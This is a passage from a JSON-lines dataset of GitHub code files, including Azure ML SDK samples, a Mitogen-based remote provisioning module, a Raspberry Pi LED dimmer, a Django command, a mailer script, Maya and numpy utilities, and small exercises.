personal_access_token_configuration]\n\n # [START job_schedule_configuration]\n from azure.ai.ml import load_job\n from azure.ai.ml.entities import JobSchedule, RecurrencePattern, RecurrenceTrigger\n\n pipeline_job = load_job(\"./sdk/ml/azure-ai-ml/tests/test_configs/command_job/command_job_test_local_env.yml\")\n trigger = RecurrenceTrigger(\n frequency=\"week\",\n interval=4,\n schedule=RecurrencePattern(hours=10, minutes=15, week_days=[\"Monday\", \"Tuesday\"]),\n start_time=\"2023-03-10\",\n )\n job_schedule = JobSchedule(name=\"simple_sdk_create_schedule\", trigger=trigger, create_job=pipeline_job)\n # [END job_schedule_configuration]\n\n # [START cron_trigger_configuration]\n from datetime import datetime\n\n from azure.ai.ml.constants import TimeZone\n from azure.ai.ml.entities import CronTrigger\n\n trigger = CronTrigger(\n expression=\"15 10 * * 1\",\n start_time=datetime(year=2022, month=3, day=10, hour=10, minute=15),\n end_time=datetime(year=2022, month=6, day=10, hour=10, minute=15),\n time_zone=TimeZone.PACIFIC_STANDARD_TIME,\n )\n # [END cron_trigger_configuration]\n\n # [START resource_requirements_configuration]\n from azure.ai.ml.entities import (\n CodeConfiguration,\n KubernetesOnlineDeployment,\n ResourceRequirementsSettings,\n ResourceSettings,\n )\n\n blue_deployment = KubernetesOnlineDeployment(\n name=\"kubernetes_deployment\",\n endpoint_name=\"online_endpoint_name\",\n model=load_model(\"./sdk/ml/azure-ai-ml/tests/test_configs/model/model_with_stage.yml\"),\n environment=\"azureml:AzureML-Minimal:1\",\n code_configuration=CodeConfiguration(\n code=\"endpoints/online/model-1/onlinescoring\", scoring_script=\"score.py\"\n ),\n instance_count=1,\n resources=ResourceRequirementsSettings(\n requests=ResourceSettings(\n cpu=\"500m\",\n memory=\"0.5Gi\",\n ),\n limits=ResourceSettings(\n cpu=\"1\",\n memory=\"1Gi\",\n ),\n ),\n )\n # [END resource_requirements_configuration]\n\n # [START ssh_job_service_configuration]\n from azure.ai.ml import command\n from azure.ai.ml.entities import JupyterLabJobService, SshJobService, TensorBoardJobService, VsCodeJobService\n\n node = command(\n name=\"interactive-command-job\",\n description=\"description\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n command=\"ls\",\n compute=\"testCompute\",\n services={\n \"my_ssh\": SshJobService(),\n \"my_tensorboard\": TensorBoardJobService(log_dir=\"~/blog\"),\n \"my_jupyter_lab\": JupyterLabJobService(),\n \"my_vscode\": VsCodeJobService(),\n },\n )\n # [END ssh_job_service_configuration]\n\n # [START build_context_entity_create]\n from azure.ai.ml.entities._assets.environment import BuildContext\n\n build_context = BuildContext(dockerfile_path=\"docker-file-path\", path=\"docker-build-context-path\")\n # [END build_context_entity_create]\n\n # [START base_env_entity_create]\n from azure.ai.ml.entities._assets._artifacts._package.base_environment_source import BaseEnvironment\n\n base_environment = BaseEnvironment(type=\"base-env-type\", resource_id=\"base-env-resource-id\")\n # [END base_env_entity_create]\n\n # [START env_entity_create]\n from azure.ai.ml.entities._assets.environment import Environment\n\n environment = Environment(\n name=\"env-name\",\n version=\"2.0\",\n description=\"env-description\",\n image=\"env-image\",\n conda_file=\"./sdk/ml/azure-ai-ml/tests/test_configs/deployments/model-1/environment/conda.yml\",\n tags={\"tag1\": \"value1\", \"tag2\": \"value2\"},\n properties={\"prop1\": \"value1\", \"prop2\": \"value2\"},\n datastore=\"datastore\",\n )\n # [END env_entity_create]\n\n # [START env_operations_create_or_update]\n from azure.ai.ml.entities import BuildContext, Environment\n\n env_docker_context = Environment(\n build=BuildContext(\n path=\"./sdk/ml/azure-ai-ml/tests/test_configs/environment/environment_files\",\n dockerfile_path=\"DockerfileNonDefault\",\n ),\n name=\"create-environment\",\n version=\"2.0\",\n description=\"Environment created from a Docker context.\",\n )\n ml_client.environments.create_or_update(env_docker_context)\n # [END env_operations_create_or_update]\n\n # [START env_entities_validate]\n from azure.ai.ml.entities import BuildContext, Environment\n\n env_docker_context = Environment(\n build=BuildContext(\n path=\"./sdk/ml/azure-ai-ml/tests/test_configs/environment/environment_files\",\n dockerfile_path=\"DockerfileNonDefault\",\n ),\n name=\"create-environment\",\n version=\"2.0\",\n description=\"Environment created from a Docker context.\",\n )\n\n env_docker_context.validate()\n # [END env_entities_validate]\n\n # [START env_operations_archive]\n ml_client.environments.archive(\"create-environment\", \"2.0\")\n # [END env_operations_archive]\n\n # [START env_operations_restore]\n ml_client.environments.restore(\"create-environment\", \"2.0\")\n # [END env_operations_restore]\n\n # [START env_operations_list]\n ml_client.environments.list()\n # [END env_operations_list]\n\n # [START env_operations_get]\n ml_client.environments.get(\"create-environment\", \"2.0\")\n # [END env_operations_get]\n\n @handle_resource_exists_error\n def ml_misc_config_1(self):\n from random import randint\n\n from azure.ai.ml import load_batch_endpoint\n from azure.ai.ml.entities import BatchEndpoint\n\n endpoint_example = load_batch_endpoint(\n source=\"./sdk/ml/azure-ai-ml/tests/test_configs/endpoints/batch/batch_endpoint_mlflow_new.yaml\",\n params_override=[{\"name\": f\"endpoint-{randint(0, 1000)}\"}],\n )\n ml_client.batch_endpoints.begin_create_or_update(endpoint_example)\n endpoint_name = endpoint_example.name\n\n # [START batch_deployment_operations_begin_create_or_update]\n from azure.ai.ml import load_batch_deployment\n from azure.ai.ml.entities import BatchDeployment\n\n deployment_example = load_batch_deployment(\n source=\"./sdk/ml/azure-ai-ml/tests/test_configs/deployments/batch/batch_deployment_anon_env_with_image.yaml\",\n params_override=[{\"name\": f\"deployment-{randint(0, 1000)}\", \"endpoint_name\": endpoint_example.name}],\n )\n\n ml_client.batch_deployments.begin_create_or_update(deployment=deployment_example, skip_script_validation=True)\n # [END batch_deployment_operations_begin_create_or_update]\n\n deployment_name = deployment_example.name\n\n # [START batch_deployment_operations_get]\n ml_client.batch_deployments.get(deployment_name, endpoint_name)\n # [END batch_deployment_operations_get]\n\n # [START batch_deployment_operations_list]\n ml_client.batch_deployments.list(endpoint_name)\n # [END batch_deployment_operations_list]\n\n # [START batch_deployment_operations_list_jobs]\n ml_client.batch_deployments.list_jobs(deployment_name, endpoint_name)\n # [END batch_deployment_operations_list_jobs]\n\n # [START batch_deployment_operations_delete]\n ml_client.batch_deployments.begin_delete(deployment_name, endpoint_name)\n # [END batch_deployment_operations_delete]\n\n # [START batch_endpoint_operations_list]\n ml_client.batch_endpoints.list()\n # [END batch_endpoint_operations_list]\n\n # [START batch_endpoint_operations_get]\n ml_client.batch_endpoints.get(endpoint_name)\n # [END batch_endpoint_operations_get]\n\n # [START batch_endpoint_operations_delete]\n ml_client.batch_endpoints.begin_delete(endpoint_name)\n # [END batch_endpoint_operations_delete]\n\n from random import randint\n\n endpoint_name_2 = f\"new-endpoint-{randint(0, 1000)}\"\n\n # [START batch_endpoint_operations_create_or_update]\n from azure.ai.ml.entities import BatchEndpoint\n\n endpoint_example = BatchEndpoint(name=endpoint_name_2)\n ml_client.batch_endpoints.begin_create_or_update(endpoint_example)\n # [END batch_endpoint_operations_create_or_update]\n\n # [START batch_endpoint_operations_invoke]\n ml_client.batch_endpoints.invoke(endpoint_name_2)\n # [END batch_endpoint_operations_invoke]\n\n # [START batch_endpoint_operations_list_jobs]\n ml_client.batch_endpoints.list_jobs(endpoint_name_2)\n # [END batch_endpoint_operations_list_jobs]\n\n def ml_misc_config_2(self):\n # [START component_operations_create_or_update]\n from azure.ai.ml import load_component\n from azure.ai.ml.entities._component.component import Component\n\n component_example = load_component(\n source=\"./sdk/ml/azure-ai-ml/tests/test_configs/components/helloworld_component.yml\",\n params_override=[{\"version\": \"1.0.2\"}],\n )\n component = ml_client.components.create_or_update(component_example)\n # [END component_operations_create_or_update]\n print(component)\n\n # [START code_operations_create_or_update]\n from azure.ai.ml.entities._assets._artifacts.code import Code\n\n code_example = Code(name=\"my-code-asset\", version=\"2.0\", path=\"./sdk/ml/azure-ai-ml/samples/src\")\n code_asset = ml_client._code.create_or_update(code_example)\n # [END code_operations_create_or_update]\n\n from random import randint\n\n data_asset_name = f\"data_asset_name_{randint(0, 1000)}\"\n # [START data_operations_create_or_update]\n from azure.ai.ml.entities import Data\n\n data_asset_example = Data(name=data_asset_name, version=\"2.0\", path=\"./sdk/ml/azure-ai-ml/samples/src\")\n ml_client.data.create_or_update(data_asset_example)\n # [END data_operations_create_or_update]\n\n # [START component_operations_list]\n print(ml_client.components.list())\n # [END component_operations_list]\n\n # [START component_operations_get]\n ml_client.components.get(name=component_example.name, version=\"1.0.2\")\n # [END component_operations_get]\n\n # [START component_operations_validate]\n from azure.ai.ml.entities._component.component import Component\n\n ml_client.components.validate(component_example)\n # [END component_operations_validate]\n\n # [START component_operations_archive]\n ml_client.components.archive(name=component_example.name)\n # [END component_operations_archive]\n\n # [START component_operations_restore]\n ml_client.components.restore(name=component_example.name)\n # [END component_operations_restore]\n\n # [START code_operations_get]\n ml_client._code.get(name=code_asset.name, version=code_asset.version)\n # [END code_operations_get]\n\n # [START data_operations_list]\n ml_client.data.list(name=\"data_asset_name\")\n # [END data_operations_list]\n\n # [START data_operations_get]\n ml_client.data.get(name=\"data_asset_name\", version=\"2.0\")\n # [END data_operations_get]\n\n # [START data_operations_import_data]\n from azure.ai.ml.entities._data_import.data_import import DataImport\n from azure.ai.ml.entities._inputs_outputs.external_data import Database\n\n database_example = Database(query=\"SELECT ID FROM DataTable\", connection=\"azureml:my_azuresqldb_connection\")\n data_import_example = DataImport(\n name=\"data_asset_name\", path=\"azureml://datastores/workspaceblobstore/paths/\", source=database_example\n )\n ml_client.data.import_data(data_import_example)\n # [END data_operations_import_data]\n\n # [START data_operations_list_materialization_status]\n ml_client.data.list_materialization_status(\"data_asset_name\")\n # [END data_operations_list_materialization_status]\n\n # [START data_operations_archive]\n ml_client.data.archive(\"data_asset_name\")\n # [END data_operations_archive]\n\n # [START data_operations_restore]\n ml_client.data.restore(\"data_asset_name\")\n # [END data_operations_restore]\n\n try:\n # [START data_operations_share]\n ml_client.data.share(\n name=\"data_asset_name\",\n version=\"2.0\",\n registry_name=\"my-registry\",\n share_with_name=\"transformed-nyc-taxi-data-shared-from-ws\",\n share_with_version=\"2.0\",\n )\n # [END data_operations_share]\n except TypeError:\n pass\n\n # [START datastore_operations_create_or_update]\n from azure.ai.ml.entities import AzureBlobDatastore\n\n datastore_example = AzureBlobDatastore(\n name=\"azure_blob_datastore\",\n account_name=\"sdkvnextclidcdnrc7zb7xyy\", # cspell:disable-line\n container_name=\"testblob\",\n )\n ml_client.datastores.create_or_update(datastore_example)\n # [END datastore_operations_create_or_update]\n\n # [START datastore_operations_list]\n ml_client.datastores.list()\n # [END datastore_operations_list]\n\n # [START datastore_operations_get]\n ml_client.datastores.get(\"azure_blob_datastore\")\n # [END datastore_operations_get]\n\n # [START datastore_operations_get_default]\n ml_client.datastores.get_default()\n # [END datastore_operations_get_default]\n\n # [START datastore_operations_delete]\n ml_client.datastores.delete(\"azure_blob_datastore\")\n # [END datastore_operations_delete]\n\n # [START validation_result]\n \"\"\"For example, if repr(self) is:\n ```python\n {\n \"errors\": [\n {\n \"path\": \"jobs.job_a.inputs.input_str\",\n \"message\": \"input_str is required\",\n \"value\": None,\n },\n {\n \"path\": \"jobs.job_a.inputs.input_str\",\n \"message\": \"input_str must be in the format of xxx\",\n \"value\": None,\n },\n {\n \"path\": \"settings.on_init\",\n \"message\": \"On_init job name job_b does not exist in jobs.\",\n \"value\": None,\n },\n ],\n \"warnings\": [\n {\n \"path\": \"jobs.job_a.inputs.input_str\",\n \"message\": \"input_str is required\",\n \"value\": None,\n }\n ]\n }\n ```\n then the error_messages will be:\n ```python\n {\n \"jobs.job_a.inputs.input_str\": \"input_str is required; input_str must be in the format of xxx\",\n \"settings.on_init\": \"On_init job name job_b does not exist in jobs.\",\n }\n ```\n \"\"\"\n\n @handle_resource_exists_error\n def ml_misc_config_3(self):\n # [START job_operations_show_services]\n job_services = ml_client.jobs.show_services(job_name)\n # [END job_operations_show_services]\n\n\nif __name__ == \"__main__\":\n sample = MiscConfigurationOptions()\n sample.ml_misc_config_0()\n sample.ml_misc_config_1()\n sample.ml_misc_config_2()\n sample.ml_misc_config_3()\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/ml/azure-ai-ml/samples/ml_samples_misc.py","file_name":"ml_samples_misc.py","file_ext":"py","file_size_in_byte":28015,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"8546881840","text":"import RPi.GPIO as GPIO\nimport time\n\nled = 16\n\nGPIO.setmode(GPIO.BOARD)\n\nGPIO.setup(led, GPIO.OUT)\npmwLed = GPIO.PWM(led, 500)\ndelTime = (float)(raw_input(\"Enter Cycle Duration: \"))\ndelTime = delTime/200\ntry:\n\tpmwLed.start(0)\n\ttime.sleep(1)\n\ti = 0\n\tchange = 1\n\twhile True:\n\t\tpmwLed.ChangeDutyCycle(i)\n\t\ttime.sleep(delTime)\n\t\ti+=change\n\t\tif i > 100:\n\t\t\tchange = -1\n\t\t\ti = 100\n\t\tif i < 0:\n\t\t\tchange = 1\n\t\t\ti = 0\nexcept KeyboardInterrupt:\n\tpmwLed.stop()\n\tGPIO.cleanup()\n","repo_name":"Dan12/piCode","sub_path":"python/dimmer.py","file_name":"dimmer.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74219991201","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\nimport random\nfrom experiment.models import DiRPiDevice, DiRPiGroup, DiRPiConfiguration\n\nclass Command(BaseCommand):\n help = 'Adds 3 dummy DiRPi devices to the database'\n\n def handle(self, *args, **kwargs):\n configuration = DiRPiConfiguration.objects.first()\n if not configuration:\n self.stdout.write(self.style.ERROR('Configuration not found. Please add it first.'))\n return\n\n groups = DiRPiGroup.objects.all()\n if not groups.exists():\n self.stdout.write(self.style.ERROR('Groups not found. Please run add_dirpi_groups command first.'))\n return\n\n for i in range(1, 4):\n group = groups[i % groups.count()] # Assigning groups in a round-robin fashion\n\n # Build device object and add to group before saving \n device = DiRPiDevice( \n device_number=i, \n group=group,\n device_ip=f'192.168.1.{i}', \n configuration=configuration, \n status='active', \n last_ping_time=timezone.now(), \n health_status='good', \n current_run_number=random.randint(1, 100) \n ) \n device.save() \n group.devices.add(device) \n group.save() \n\n self.stdout.write(self.style.SUCCESS(f'Device {device.device_id} added to group {group.group_name} successfully.'))\n","repo_name":"joseph-crowley/accelerator-diagnostics-project","sub_path":"experiment/management/commands/add_dirpi_devices.py","file_name":"add_dirpi_devices.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6813521159","text":"import unittest\r\nimport os\r\nfrom src.utils.DataExporter import DataExporter\r\n\r\nclass TestDataExporter(unittest.TestCase):\r\n def setUp(self):\r\n self.data_exporter = DataExporter()\r\n\r\n def test_export_data(self):\r\n data = {\"test\": \"data\"}\r\n filename = \"test_export_data.json\"\r\n self.data_exporter.export_data(data, filename)\r\n self.assertTrue(os.path.exists(filename))\r\n os.remove(filename)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"ai1967rs/etsybots","sub_path":"plant/tests/test_data_exporter.py","file_name":"test_data_exporter.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9143257662","text":"from __future__ import annotations\nfrom typing import Dict, Optional, Sequence, Generator, Any, BinaryIO, ContextManager\nimport collections\nimport contextlib\nimport threading\nimport logging\nimport uuid\nimport io\ntry:\n import mitogen\n import mitogen.core\n import mitogen.master\n import mitogen.service\n import mitogen.parent\nexcept ModuleNotFoundError:\n mitogen = None\nfrom .. import actions\nfrom ..fileasset import FileAsset, LocalFileAsset, ZipFileAsset\nfrom .system import System, PipelineInfo\nfrom .pipeline import LocalPipelineMixin\nfrom .local import LocalExecuteMixin\n\nlog = logging.getLogger(__name__)\n\n_this_system_lock = threading.Lock()\n_this_system = None\n\n\nif mitogen is None:\n\n class Mitogen(System):\n def __init__(self, *args, **kw):\n raise NotImplementedError(\"the mitogen python module is not installed on this system\")\n\nelse:\n class MitogenCachedFileAsset(FileAsset):\n def __init__(self, cached: bytes, serialized: Dict[str, Any]):\n super().__init__()\n self.cached = cached\n self.serialized = serialized\n\n def serialize(self) -> Dict[str, Any]:\n return self.serialized\n\n @contextlib.contextmanager\n def open(self) -> ContextManager[BinaryIO]:\n with io.BytesIO(self.cached) as buf:\n yield buf\n\n def copy_to(self, dst: BinaryIO):\n dst.write(self.cached)\n\n class MitogenFileAsset(FileAsset):\n def __init__(self, local_mitogen: \"LocalMitogen\", remote_path: str):\n super().__init__()\n self.local_mitogen = local_mitogen\n self.remote_path = remote_path\n\n def serialize(self) -> Dict[str, Any]:\n res = super().serialize()\n res[\"type\"] = \"local\"\n res[\"path\"] = self.remote_path\n return res\n\n @contextlib.contextmanager\n def open(self) -> ContextManager[BinaryIO]:\n with io.BytesIO() as buf:\n self.copy_to(buf)\n buf.seek(0)\n yield buf\n\n def copy_to(self, dst: BinaryIO):\n ok, metadata = mitogen.service.FileService.get(\n context=self.local_mitogen.parent_context,\n path=self.remote_path,\n out_fp=dst,\n )\n if not ok:\n raise IOError(f'Transfer of {self.path!r} was interrupted')\n\n class LocalMitogen(LocalExecuteMixin, LocalPipelineMixin, System):\n def __init__(self, parent_context: mitogen.core.Context, router: mitogen.core.Router):\n super().__init__(\"local_mitogen\")\n self.parent_context = parent_context\n self.router = router\n\n def remap_file_asset(self, asset: FileAsset):\n if asset.cached is not None:\n return MitogenCachedFileAsset(asset.cached, asset.serialize())\n elif isinstance(asset, LocalFileAsset):\n return MitogenFileAsset(self, asset.path)\n # elif isinstance(asset, ZipFileAsset):\n # return MitogenZipFileAsset(self, asset.archive, asset.path)\n else:\n raise NotImplementedError(f\"Unable to handle File asset of type {asset.__class__!r}\")\n\n class Mitogen(System):\n \"\"\"\n Access a system via Mitogen\n \"\"\"\n internal_broker = None\n internal_router = None\n\n def __init__(self, name: str, method: str, router: Optional[mitogen.master.Router] = None, **kw):\n super().__init__(name)\n if router is None:\n if self.internal_router is None:\n self.internal_broker = mitogen.master.Broker()\n self.internal_router = mitogen.master.Router(self.internal_broker)\n router = self.internal_router\n self.router = router\n self.file_service = mitogen.service.FileService(router)\n self.pool = mitogen.service.Pool(router=self.router, services=[self.file_service])\n\n meth = getattr(self.router, method, None)\n if meth is None:\n raise KeyError(f\"conncetion method {method!r} not available in mitogen\")\n\n kw.setdefault(\"python_path\", \"/usr/bin/python3\")\n self.context = meth(remote_name=name, **kw)\n\n self.pending_actions = collections.deque()\n\n def close(self):\n self.context.shutdown(wait=True)\n\n def share_file(self, pathname: str):\n self.file_service.register(pathname)\n\n def share_file_prefix(self, pathname: str):\n self.file_service.register_prefix(pathname)\n\n def execute(self, action: actions.Action) -> actions.Action:\n res = self.context.call(self._remote_run_actions, self.router.myself(), action.serialize())\n return actions.Action.deserialize(res)\n\n def send_pipelined(self, action: actions.Action, pipeline_info: PipelineInfo):\n \"\"\"\n Execute this action as part of a pipeline\n \"\"\"\n serialized = action.serialize()\n serialized[\"__pipeline__\"] = pipeline_info.serialize()\n self.pending_actions.append(\n self.context.call_async(self._remote_run_actions, self.router.myself(), serialized)\n )\n\n def receive_pipelined(self) -> Generator[actions.Action, None, None]:\n \"\"\"\n Receive results of the actions that have been sent so far.\n\n It is ok to enqueue new actions while this method runs\n \"\"\"\n while self.pending_actions:\n yield actions.Action.deserialize(self.pending_actions.popleft().get().unpickle())\n\n def pipeline_clear_failed(self, pipeline_id: str):\n self.context.call_no_reply(self._pipeline_clear_failed, pipeline_id)\n\n def pipeline_close(self, pipeline_id: str):\n self.context.call_no_reply(self._pipeline_close, pipeline_id)\n\n def run_actions(self, action_list: Sequence[actions.Action]) -> Generator[actions.Action, None, None]:\n \"\"\"\n Run a sequence of provisioning actions in the chroot\n \"\"\"\n pipeline = PipelineInfo(str(uuid.uuid4()))\n for act in action_list:\n self.send_pipelined(act, pipeline)\n yield from self.receive_pipelined()\n\n @classmethod\n def _pipeline_clear_failed(cls, pipeline_id: str):\n global _this_system, _this_system_lock\n with _this_system_lock:\n if _this_system is None:\n return\n system = _this_system\n system.pipeline_clear_failed(pipeline_id)\n\n @classmethod\n def _pipeline_close(self, pipeline_id: str):\n global _this_system, _this_system_lock\n with _this_system_lock:\n if _this_system is None:\n return\n system = _this_system\n system.pipeline_close(pipeline_id)\n\n @classmethod\n @mitogen.core.takes_router\n def _remote_run_actions(\n self,\n context: mitogen.core.Context,\n action: actions.Action,\n router: mitogen.core.Router = None) -> Dict[str, Any]:\n\n global _this_system, _this_system_lock\n with _this_system_lock:\n if _this_system is None:\n _this_system = LocalMitogen(parent_context=context, router=router)\n system = _this_system\n\n pipeline_info = action.pop(\"__pipeline__\", None)\n\n # Convert LocalFileAsset to something that fetches via Mitogen\n file_assets = action.get(\"__file_assets__\", None)\n if file_assets is None:\n file_assets = []\n\n action = actions.Action.deserialize(action)\n for name in file_assets:\n setattr(action, name,\n system.remap_file_asset(\n getattr(action, name)))\n\n if pipeline_info is None:\n action = system.execute(action)\n else:\n pipeline = PipelineInfo.deserialize(pipeline_info)\n action = system.execute_pipelined(action, pipeline)\n return action.serialize()\n","repo_name":"spanezz/transilience","sub_path":"transilience/system/mitogen.py","file_name":"mitogen.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"54"} +{"seq_id":"41891893320","text":"import sys\nimport json\nimport re\n\ndef load_json(path):\n\twith open(path, \"r\") as j:\n\t\treturn json.load(j)\n\t\t\ndef save_json(data, path):\n\twith open(path, \"w\") as j:\n\t\tjson.dump(data, j)\n\t\t\ndef option_to_dict(string):\n\tdesc = re.findall('\\*([^*]+)\\*', string)\n\tif len(desc) > 0:\n\t\tdesc = desc[0]\n\telse:\n\t\tdesc = \"\"\n\tname = \" \".join(string.replace('*' + desc + '*', \"\").split())\n\td = {}\n\tif len(desc) > 0:\n\t\td[\"desc\"] = desc\n\tif len(name) > 0:\n\t\td[\"name\"] = name\n\t#print(\"name: \", name,\"desc: \", desc)\n\treturn d\n\ndef main(p_path, path, e_path, *args):\n\t#print(\"p-add_o-path: \", path)\n\t#print(\"p-add_o-e_path: \", e_path)\n\t#print(\"p-add_o-args: \", list(args))\n\t\n\tif len(args) < 4:\n\t\tprint(\"bad input\")\n\t\treturn 1\n\t\n\toptions = load_json(path + \"/.options/options.json\")\n\t\n\tflag, arg, program, *file_name = args\n\tfile_name = ' '.join(file_name)\n\t\n\tif flag[0] != '-':\n\t\tprint(\"bad input\")\n\t\treturn 1\n\t\n\tfor option in options[1:]:\n\t\tif option[\"flag\"] == flag:\n\t\t\tprint(\"bad input\")\n\t\t\treturn 1\n\t\t\t\n\tif arg == \"True\" or arg == \"False\":\n\t\tpass\n\telse:\n\t\tprint(\"bad input\", arg)\n\t\treturn 1\n\t\n\t#print(flag, arg, program, file_name)\n\t\n\tnew_command = {\"flag\": flag, \"program\": program, \"file\": file_name, \"args\": arg}\n\toptions.append(new_command)\n\tsave_json(options, path + \"/.options/options.json\")\n\t\n\t#print(data)\n\nif __name__ == \"__main__\":\n\tmain(*sys.argv)\n","repo_name":"qwality/bash-commands","sub_path":".commands/.options/add_option.py","file_name":"add_option.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28000523431","text":"# begin\t| target |\t words\t | return\n# \"hit\"\t| \"cog\"\t | [\"hot\", \"dot\", \"dog\", \"lot\", \"log\", \"cog\"] | 4\n# \"hit\"\t| \"cog\"\t | [\"hot\", \"dot\", \"dog\", \"lot\", \"log\"]\t | 0\nfrom collections import deque\n\nwords = [\"hot\", \"dot\", \"dog\", \"lot\", \"log\"]\ndef solution(begin, target, words):\n q = deque([(begin, 0)])\n visited = [False for k in range(len(words))]\n while q:\n on_prc, prc_cnt = q.popleft()\n for j, word in enumerate(words):\n cnt = 0\n for i, c in enumerate(on_prc):\n wc = word[i]\n if wc != c:\n cnt += 1\n\n if cnt > 1:\n break\n\n if cnt == 1:\n if word == target:\n return prc_cnt + 1\n if not visited[j]:\n q.append([word, prc_cnt+1])\n visited[j] = True\n\n\n\n return 0\n\nprint(solution(\"hit\", \"cog\", words))","repo_name":"yxnxj/Algorithms","sub_path":"Programmers/lv3_단어변환/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34584868647","text":"#!/usr/bin/env python\nimport os\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\n\ndef sendMail(to, subject, content):\n\ttry:\n\t\tsender = \"crawler@bauman.is\"\n\n\t\tmsg = MIMEText(content)\n\t\tmsg['Subject'] = subject\n\t\tmsg['From'] = sender\n\t\tmsg['To'] = to\n\n\t\tmail = smtplib.SMTP('smtp.gmail.com', 587)\n\t\tmail.ehlo()\n\t\tmail.starttls()\n\t\tmail.login('script@dunb.lv',os.environ['DUNB_PASS'])\n\t\tmail.sendmail(sender, [to], msg.as_string())\n\texcept:\n\t\tprint (\"Sending failed\")\n\t\treturn False\n\telse:\n\t\tprint (\"Mail to \" + to + \" sent.\\nSubject: \" + subject + \"\\nMessage: \" + content)\n\t\n\tmail.quit()\n\t\n\t\n#sendMail('testing')","repo_name":"KarlBaumann/python-camera-pir","sub_path":"mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"19295352565","text":"\n\n# Definicion de una matriz de 3 filas x 4 columnas\nmatriz = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n]\n\n# Accesos a los elementos \n\nmatriz[0][0] #1\nmatriz[1][2] #7\n\n# Ejemplo funcion suma de matrices\ndef suma_matrices(A, B):\n \"\"\"\n Suma dos matrices\n Precondicion: A y B son del mismo tamaño y son matrices de numeros\n \"\"\"\n cant_filas = len(A)\n cant_cols = len(A[0])\n\n C = []\n\n for fila in range(cant_filas):\n fila_suma = []\n for col in range(cant_cols):\n fila_suma.append(A[fila][col] + B[fila][col])\n C.append(fila_suma)\n return C\n\nsuma_matrices(matriz, matriz)","repo_name":"dkippes/Python-Practicas","sub_path":"Estructuras de datos en Python/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31277088632","text":"import maya.cmds as cmds\n\ndef shadersFromObject(obj):\n cmds.select(obj, replace=True)\n cmds.hyperShade(obj, shaderNetworkSelectMaterialNode=True)\n shaders = cmds.ls(selection=True)\n return shaders\n\ndef isGeometry(obj):\n \n shapes = cmds.listRelatives(obj, shapes=True)\n shapeType = cmds.nodeType(shapes[0])\n geometryTypes = ['mesh', 'nurbsSurface', 'subdiv']\n \n if shapeType in geometryTypes:\n return True\n \n return False\n\ndef findUnattachedObjects():\n \n # Getting a list of all the obj in the scene\n objects = cmds.ls(type=\"transform\")\n\n unShaded = []\n \n # Running through the list and Checking whether a given node is geometry\n for i in range(0, len(objects)):\n # For geometric node, find the shaders applied to it\n if (isGeometry(objects)):\n shaders = shadersFromObject(objects[i])\n\n # Adding Non-shaded objects to non-shaded obj list\n if (len(shaders) < 1):\n unShaded.append(objects[i])\n\n # Create a new shader & Apply it to the shader-less obj\n newShader = cmds.shadingNode('blinn', asShader=True)\n cmds.setAttr(newShader + '.color', 0, 1, 1, type=\"double3\")\n \n cmds.select(unShaded, replace=True)\n cmds.hyperShade(assign=newShader)\n \nfindUnattachedObjects()\n","repo_name":"JaewanKim/maya-plugin","sub_path":"study/findUnattachedObject.py","file_name":"findUnattachedObject.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"44690692929","text":"from sklearn.naive_bayes import GaussianNB\nimport helper\nimport matplotlib.pyplot as plt\n\n\nif __name__ == \"__main__\":\n\n dataSet=helper.getData()\n X = ['X', 'Y', 'Z']\n Y = 'Activity'\n\n model=GaussianNB()\n helper.testModel(model,dataSet,X,Y)\n report=helper.generateReport(model,dataSet,X,Y)\n print(report)\n title = \"Learning Curves Naive Bayes\"\n helper.plot_learning_curve(model, title, dataSet[X], dataSet[Y], cv=10, n_jobs=4)\n plt.show()\n","repo_name":"haider24/ActivityClassifier","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14230109400","text":"from ctypes import CDLL, c_int, c_size_t, c_void_p\nfrom ctypes.util import find_library\nimport numpy_allocator\n\nstd = CDLL(find_library('c'))\n\nstd.free.argtypes = [c_void_p]\nstd.free.restype = None\n\nstd.memalign.argtypes = [c_size_t, c_size_t]\nstd.memalign.restype = c_void_p\n\nstd.memcpy.argtypes = [c_void_p, c_void_p, c_size_t]\nstd.memcpy.restype = c_void_p\n\nstd.memset.argtypes = [c_void_p, c_int, c_size_t]\nstd.memset.restype = c_void_p\n\nstd.realloc.argtypes = [c_void_p, c_size_t]\nstd.realloc.restype = c_void_p\n\n\nclass aligned_allocator(numpy_allocator.object):\n\n def __init__(self, alignment):\n self.alignment = alignment\n\n def __str__(self):\n return '{}({})'.format(self.__class__.__name__, self.alignment)\n\n def _calloc_(self, nelem, elsize):\n result = std.memalign(self.alignment, nelem * 